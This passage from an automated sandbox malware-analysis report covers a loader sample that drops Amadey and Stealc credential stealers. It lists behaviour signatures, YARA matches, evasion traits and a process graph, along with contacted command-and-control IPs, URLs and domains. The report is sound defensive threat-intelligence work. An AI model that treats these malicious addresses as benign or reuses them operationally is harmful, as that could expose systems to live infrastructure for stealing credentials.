Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E60698 cpuid 7_2_00E60698
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 22_2_00657B90
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000336001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000336001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 7_2_00EB8195
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E9D27A GetUserNameW, 7_2_00E9D27A
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E7B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 7_2_00E7B952
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 7_2_00E442DE
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 2.2.skotes.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.xwZfYpo16i.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.2117620927.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2131405540.0000000000221000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2158417575.0000000000B01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2116705188.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2157232237.0000000000B01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2044316715.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2520519803.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 00000007.00000003.3851843116.0000000001410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cb428cafc9.exe PID: 6520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cb428cafc9.exe PID: 4568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cb428cafc9.exe PID: 7096, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 41.0.num.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.num.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.num.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.num.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000002.2898285254.0000000000641000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2737892178.000000000145E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.2723151749.0000000000641000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.2898759445.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.2885228529.0000000000641000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2737034611.0000000000641000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: num.exe PID: 2448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 3568, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
OS version to string mapping found (often used in BOTs)
Source: cb428cafc9.exe Binary or memory string: WIN_81
Source: cb428cafc9.exe Binary or memory string: WIN_XP
Source: random[1].exe.6.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: cb428cafc9.exe Binary or memory string: WIN_XPe
Source: cb428cafc9.exe Binary or memory string: WIN_VISTA
Source: cb428cafc9.exe Binary or memory string: WIN_7
Source: cb428cafc9.exe Binary or memory string: WIN_8

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 00000007.00000003.3851843116.0000000001410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cb428cafc9.exe PID: 6520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cb428cafc9.exe PID: 4568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cb428cafc9.exe PID: 7096, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 41.0.num.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.num.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.num.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.num.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000002.2898285254.0000000000641000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2737892178.000000000145E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.2723151749.0000000000641000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.2898759445.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.2885228529.0000000000641000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2737034611.0000000000641000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: num.exe PID: 2448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 3568, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EC1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 7_2_00EC1204
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EC1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 7_2_00EC1806
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527965 Sample: xwZfYpo16i.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 89 sergei-esenin.com 2->89 91 licendfilteo.site 2->91 93 8 other IPs or domains 2->93 115 Suricata IDS alerts for network traffic 2->115 117 Found malware configuration 2->117 119 Antivirus detection for URL or domain 2->119 121 16 other signatures 2->121 9 skotes.exe 3 22 2->9         started        14 xwZfYpo16i.exe 5 2->14         started        16 skotes.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 dnsIp5 105 185.215.113.43, 49904, 49920, 49951 WHOLESALECONNECTIONSNL Portugal 9->105 107 185.215.113.103, 49925, 50003, 50023 WHOLESALECONNECTIONSNL Portugal 9->107 77 C:\Users\user\AppData\...\4db5303091.exe, PE32 9->77 dropped 79 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 9->79 dropped 81 C:\Users\user\AppData\...\cb428cafc9.exe, PE32 9->81 dropped 87 3 other malicious files 9->87 dropped 151 Creates multiple autostart registry keys 9->151 153 Hides threads from debuggers 9->153 155 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->155 20 4db5303091.exe 9->20         started        24 cb428cafc9.exe 9->24         started        26 num.exe 13 9->26         started        83 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->83 dropped 85 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->85 dropped 157 Detected unpacking (changes PE section rights) 14->157 159 Tries to evade debugger and weak emulator (self modifying code) 14->159 161 Tries to detect virtualization through RDTSC time measurements 14->161 28 skotes.exe 14->28         started        163 Antivirus detection for dropped file 16->163 165 Machine Learning detection for dropped file 16->165 167 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->167 169 Binary is likely a compiled AutoIt script file 18->169 171 Excessive usage of taskkill to terminate processes 18->171 30 taskkill.exe 18->30         started        32 taskkill.exe 18->32         started        34 taskkill.exe 18->34         started        36 19 other processes 18->36 file6 signatures7 process8 dnsIp9 95 sergei-esenin.com 172.67.206.204, 443, 50031, 50043 CLOUDFLARENETUS United States 20->95 97 steamcommunity.com 104.102.49.254, 443, 50030, 50041 AKAMAI-ASUS United States 20->97 123 Antivirus detection for dropped file 20->123 125 Multi AV Scanner detection for dropped file 20->125 127 Detected unpacking (changes PE section rights) 20->127 147 2 other signatures 20->147 129 Binary is likely a compiled AutoIt script file 24->129 131 Machine Learning detection for dropped file 24->131 133 Found API chain indicative of sandbox detection 24->133 135 Excessive usage of taskkill to terminate processes 24->135 38 chrome.exe 8 24->38         started        42 taskkill.exe 1 24->42         started        44 taskkill.exe 1 24->44         started        54 3 other processes 24->54 99 185.215.113.37, 50012, 50035, 50048 WHOLESALECONNECTIONSNL Portugal 26->99 137 Found evasive API chain (may stop execution after checking locale) 26->137 139 Searches for specific processes (likely to inject) 26->139 141 Hides threads from debuggers 28->141 143 Tries to detect sandboxes / dynamic malware analysis system (registry check) 28->143 145 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 28->145 46 conhost.exe 30->46         started        48 conhost.exe 32->48         started        50 conhost.exe 34->50         started        52 conhost.exe 36->52         started        56 18 other processes 36->56 signatures10 process11 dnsIp12 101 192.168.2.5, 138, 443, 49180 unknown unknown 38->101 103 239.255.255.250 unknown Reserved 38->103 149 Excessive usage of taskkill to terminate processes 38->149 58 chrome.exe 38->58         started        61 chrome.exe 38->61         started        63 chrome.exe 38->63         started        75 5 other processes 38->75 65 conhost.exe 42->65         started        67 conhost.exe 44->67         started        69 conhost.exe 54->69         started        71 conhost.exe 54->71         started        73 conhost.exe 54->73         started        signatures13 process14 dnsIp15 109 www3.l.google.com 142.250.184.206, 443, 50010 GOOGLEUS United States 58->109 111 youtube.com 142.250.185.110, 443, 49959 GOOGLEUS United States 58->111 113 5 other IPs or domains 58->113
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
172.217.18.14
 play.google.com United States
15169 GOOGLEUS false
142.250.185.110
 youtube.com United States
15169 GOOGLEUS false
172.67.206.204
 sergei-esenin.com United States
13335 CLOUDFLARENETUS true
172.217.23.110
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS false
142.250.184.206
 www3.l.google.com United States
15169 GOOGLEUS false
185.215.113.103
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
172.217.16.132
 www.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.2.5

Contacted Domains

Name IP Active
youtube-ui.l.google.com 172.217.23.110 true
steamcommunity.com 104.102.49.254 true
www3.l.google.com 142.250.184.206 true
play.google.com 172.217.18.14 true
www.google.com 172.217.16.132 true
sergei-esenin.com 172.67.206.204 true
youtube.com 142.250.185.110 true
bathdoomgaz.store unknown unknown
spirittunek.store unknown unknown
licendfilteo.site unknown unknown
studennotediw.store unknown unknown
mobbipenju.store unknown unknown
accounts.youtube.com unknown unknown
eaglepawnoy.store unknown unknown
www.youtube.com unknown unknown
clearancek.site unknown unknown
dissapoiznw.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.43/Zu7JuNko/index.php true
    		unknown
    https://steamcommunity.com/profiles/76561199724331900 true
    • URL Reputation: malware
    		 unknown
    https://www.google.com/favicon.ico false
      		unknown
      http://185.215.113.37/ true
      • URL Reputation: malware
      		 unknown
      http://185.215.113.37/e2b1563c6670f193.php true
      • URL Reputation: malware
      		 unknown
      https://play.google.com/log?format=json&hasfast=true&authuser=0 false
        		unknown